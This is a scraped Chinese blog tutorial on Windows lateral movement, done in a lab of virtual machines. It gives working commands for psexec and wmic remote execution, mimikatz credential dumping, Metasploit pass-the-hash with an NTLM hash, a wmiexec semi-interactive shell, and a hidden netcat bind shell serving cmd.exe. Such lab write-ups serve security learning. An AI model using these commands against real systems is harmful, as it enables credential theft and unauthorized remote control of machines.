首页 > 系统相关 >Windows远程命令执行——psexec、wmiexec、wmic、nc,这属于横向移动范畴,另外还有smbexec漏掉了

Windows远程命令执行——psexec、wmiexec、wmic、nc,这属于横向移动范畴,另外还有smbexec漏掉了

时间:2023-06-01 11:06:04浏览次数:36  
标签:Administrator exe wmiexec Windows nc 192.168 30.128 psexec

环境:Win10、Win7虚拟机

Windows远程命令执行

1、psexec.exe远程执行命令

psexec \\192.168.30.128 -u Administrator -p 123456789 cmd.exe

 

Windows远程命令执行——psexec、wmiexec、wmic、nc,这属于横向移动范畴,另外还有smbexec漏掉了_WMI

这里一开始登陆的是另一个管理员账号,但是一直被拒绝访问,后来把Administrator账号取消隐藏,一下就连接上。之后看到一篇文章也有一样的情况,只有Administrator账号才能连接,就算是管理员用户组的其他用户也不能连接,UAC的问题。

2、使用Hash登陆Windows

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit"

 

Windows远程命令执行——psexec、wmiexec、wmic、nc,这属于横向移动范畴,另外还有smbexec漏掉了_Windows_02

或者使用wce抓取hash值:

Windows远程命令执行——psexec、wmiexec、wmic、nc,这属于横向移动范畴,另外还有smbexec漏掉了_Windows_03

msf调用payload:

  1.  
    use exploit/windows/smb/psexec
  2.  
    show
  3.  
    set RHOST 192.168.30.128
  4.  
    Set SMBPass 0182BD0BD4444BF867CD839BF040D93B:C22B315C040AE6E0EFEE3518D830362B
  5.  
    set
  6.  
    show
  7.  
    Run

Windows远程命令执行——psexec、wmiexec、wmic、nc,这属于横向移动范畴,另外还有smbexec漏掉了_WMI_04

3、利用wmiexec工具配合进行反弹半交互shell

cscript.exe //nologo wmiexec.vbs /shell 192.168.30.128 Administrator 123456789

 

Windows远程命令执行——psexec、wmiexec、wmic、nc,这属于横向移动范畴,另外还有smbexec漏掉了_拒绝访问_05

还可以单条命令执行

Windows远程命令执行——psexec、wmiexec、wmic、nc,这属于横向移动范畴,另外还有smbexec漏掉了_WMI_06

4、WMI执行命令方式,无回显

wmic /node:192.168.30.128 /user:Administrator /password:123456789  process call create "cmd.exe /c ipconfig>c:\result.txt"

 

Windows远程命令执行——psexec、wmiexec、wmic、nc,这属于横向移动范畴,另外还有smbexec漏掉了_WMI_07

执行成功后可以在被控制的机器里面找到执行结果的文件

Windows远程命令执行——psexec、wmiexec、wmic、nc,这属于横向移动范畴,另外还有smbexec漏掉了_拒绝访问_08

5、nc远程执行

先在被控机器上开启监听,-L:让监听者在连接多次掉线时仍坚持监听,-d:让nc隐藏运行,-e:指定要运行的程序,-p:监听的端口

nc.exe -L -d -e cmd.exe -p 5555

 

Windows远程命令执行——psexec、wmiexec、wmic、nc,这属于横向移动范畴,另外还有smbexec漏掉了_拒绝访问_09

控制端运行nc64.exe 192.168.30.128 5555

 

Windows远程命令执行——psexec、wmiexec、wmic、nc,这属于横向移动范畴,另外还有smbexec漏掉了_Windows_10

 

 

标签:Administrator,exe,wmiexec,Windows,nc,192.168,30.128,psexec
From: https://blog.51cto.com/u_11908275/6392862

相关文章

  • powercat 果然windows defender实时保护就不让我下载 关闭以后才可以运行
     ......
  • easy_install uncompyle6 egg
    localhost:~#easy_installuncompyle6-3.0.1-py3.6.eggProcessinguncompyle6-3.0.1-py3.6.eggCopyinguncompyle6-3.0.1-py3.6.eggto/root/anaconda3/lib/python3.6/site-packagesAddinguncompyle63.0.1toeasy-install.pthfileInstallingpydisassemblescriptto/......
  • 如果关闭windows屏幕广告
    windows锁屏广告怎么关?右上角的推广广告,如何关闭呢?进入设置,个性化,锁屏设置欢迎关注公-众-号【TaonyDaily】、留言、评论,一起学习。文章来源:刘俊涛的博客若有帮助到您,欢迎点赞、转发、支持,您的支持是对我坚持最好的肯定(_)......
  • windows复制粘贴功能失效的解决方案
    解决方案:1、如果远程复制正在进行,先使用任务管理器,强制结束:将任务管理器面板切换到进程,找到rdpclip.exe,选中它,然后点击结束进程。(电脑主要依赖该进程进行粘贴) 2、键盘上按Win+R组合键,弹出“运行”窗口,输入rdpclip.exe,按回车,重新启动复制粘贴功能 3、启动成功后,就可以正常......
  • AsyncTask 异步任务基本使用-下载视频
    概述android提供了一个异步任务类AsyncTask,使创建异步任务、更新UI变得更加简单,不再需要编写任务线程和Handler实例即可完成相同的任务。本例子将演示并实现,使用AsyncTask来下载视频。详细一、准备工作开发环境:jdk1.8EclipseLunaServiceRelease1(4.4.1)运行环......
  • Inofity+Rsync实时同步服务部署
    第一步:部署rsync服务1.1服务端:1.检查rsync是否安装[root@rsync-backup~]#rpm-qarsyncrsync-3.1.2-12.el7_9.x86_642.对rsync服务进行配置[root@rsync-backup~]#cat/etc/rsyncd.confuid=rsyncgid=rsyncfakesuper=yesusechroot=nomaxconnections=......
  • m基于FPGA的RGB转ycrcb颜色空间转换算法实现,包含testbench,对比三种转换方法
    1.算法仿真效果vivado2019.2仿真结果如下:其中1为直接乘法公式计算;2为移位法计算;3为分布式计算;2.算法涉及理论知识概要人类获得信息的主要方式是视觉,通常情况下颜色有2种描述方式,一种是RGB色度空间表示,一种是YCbCr色度空间表示。然而,普通的RGB颜色空间对视频的显示存在......
  • Windows 配置 Hadoop and Spark
    一JDK环境配置由于项目用的JDK17,所以单独给Hadoop配了JDK11,建议直接配置JAVA_HOME环境变量为JDK11,因为后面Spark需要用到JAVA_HOME下载JDK11链接:https://www.oracle.com/java/technologies/javase/jdk11-archive-downloads.html目前Hadoop和Spark兼容JDK11和JDK8单独修改Had......
  • m基于FPGA的RGB转ycrcb颜色空间转换算法实现,包含testbench,对比三种转换方法
    1.算法仿真效果vivado2019.2仿真结果如下: 其中1为直接乘法公式计算; 2为移位法计算; 3为分布式计算; 2.算法涉及理论知识概要        人类获得信息的主要方式是视觉,通常情况下颜色有2种描述方式,一种是RGB色度空间表示,一种是YCbCr色度空间表示。然而,普通......
  • [Docker] Container communcation
    ForexampleyouhavetwocontainersrunningContainerA:needtotalktoContainerBContainerB,runninganodeapplicationexportport1337 FromcontainerAdockercomposeexec-itcontainerAbashYoucanpingcontainerBnc-vcontainerB1337Tochec......